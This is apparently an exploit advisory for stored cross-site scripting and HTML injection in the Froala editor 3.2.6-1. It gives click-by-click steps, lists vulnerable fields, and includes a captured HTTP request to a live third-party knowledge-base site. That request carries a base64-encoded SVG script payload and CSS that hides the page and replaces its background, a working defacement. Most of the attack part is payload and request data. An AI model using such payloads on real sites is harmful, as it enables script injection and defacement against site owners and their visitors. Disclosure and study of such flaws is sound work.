Froala 3.2.6-1 Cross Site Scripting

Froala version 3.2.6-1 suffers from persistent cross site scripting vulnerabilities.


MD5 | 9a819a95233892d40a1f0d262acbd828

# Exploit Title: Stored XSS and Html Code Injection Editor Froala
# Version 3.2.6-1
# Date:06.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://froala.com/wysiwyg-editor/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# My Youtube Channel: https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ

PoC:

In the Froala I used xss code in base 64 and some tags for html code injection.


Vuln Fields: Embed Url,Insert Link,Insert Files,Insert Video,etc.

Example with Insert Files or Insert Image:

Click browse files – choose file img from computer

Insert on page , click on image and choose Insert Link and paste XSS code:

And insert! We have stored xss + full html code Injection deface page.

XSS Code:

https://pastebin.com/jUUXQbzs

Video with XSS and Html Code Injection:

https://www.youtube.com/watch?v=QO2XiR8N1P0

All fields with xss in base64 vulnerable to XSS. You can use method
Get or Post.

Encode your xss is here:

https://www.base64encode.org/

For Html Code Injection i use tags:

Table,Div,span,style,body and another.

Pictures:

https://imgur.com/a/WIfQQw5
https://imgur.com/a/P59ePrm
https://imgur.com/a/Ksc5VWX

Simple example on knowledgeowl.com: (They use Froala)

Create new article and in editor choose and press "Code View":

Paste xss code and again press "Code View" and save this.

Example link : https://test345.knowledgeowl.com/help/asxdcfvgbvnm

(Link works only 1 months)

https://app.knowledgeowl.com/kb/article-edit-save

Host: app.knowledgeowl.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)
Gecko/20100101 Firefox/86.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data;
boundary=---------------------------116499600342865829691384395973

Content-Length: 4793

Origin: https://app.knowledgeowl.com

Connection: keep-alive

Referer: https://app.knowledgeowl.com/kb/article/id/6043b120ec161c7539dea231/aid/60464e9e8e121c1923587f5f

Cookie: (i delete this)

Upgrade-Insecure-Requests: 1

article-id=60464e9e8e121c1923587f5f&project_id=6043b120ec161c7539dea231&language=en&current_version=60464f2a8e121c172358807e&version=&category=&content_article=&linked_article=&dopen=1615238721&save-action=default&url_hash=asxdcfvgbvnm&title=asxdcfvgbvnm&toc_title=&internal_title=&art-redirect-url=&art-redirect-newtab=true&content=<p>""><embed
src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxCjk0IiBoZWlnaHQ9IjIwMCIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KCJJIGVuY29kZWQgeHNzIGluIGJhc2UgNjQuIEFic29sdXRlbHkgYWxsIGVkaXRvcnMgdnVsbmFyYWJsZSB0byB4c3MgYW5kIGh0bWwvaWZyYW1lIGNvZGUgaW5qZWN0aW9uIGFuZCB0aGlzIGlzIG5vdCBhIGJpZyBwcm9ibGVtLCBiZWNhdXNlIHRoaXMgaXMgY2FuIGZpeGVkLiBGaXggb24gZWRpdG9yIHNpZGUgYW5kIHlvdXIgc29mdHdhcmUuIFdoYXQgZWRpdG9ycyB0aGUgYmVzdD8gVGlueU1DRSwgRnJvYWxhIGFuZCBDa2VkaXRvciEiKTs8L3NjcmlwdD48L3N2Zz4KCgo="></p><style>body{visibility:hidden;}html{background:
url(https://i.pinimg.com/originals/07/02/00/0702007f97e1804a8ca00fb36033e9ec.jpg)
round;}</style>&meta_page_title=&meta_description=&status=published&date_published=&author=6043b10eec161c8d39dea36f&visibility=public&callout=none&callout_expire=03/15/2021&version_type=&custom-version=&version_note=&related-id[]=&application_screens=&csrf-token=af5366a45b186b5407fb55a1285b0f6ece862e25a46ebcfc070ab1d146b8b990

POST: HTTP/1.1 302 Found

Date: Mon, 08 Mar 2021 16:25:33 GMT

Server: Apache

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: _authbysession=90d12858ba2ea25a0ad42782; expires=Mon,
08-Mar-2021 18:25:33 GMT; Max-Age=7200; path=/;
domain=app.knowledgeowl.com; secure; httponly

Location: /kb/article/id/6043b120ec161c7539dea231/aid/60464e9e8e121c1923587f5f

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 21

Content-Type: text/html; charset=UTF-8

The final results in a simple form:

We can use different fields in Froal's editor using cross site
scripting and html/iframe code injection in base 64.

Related Posts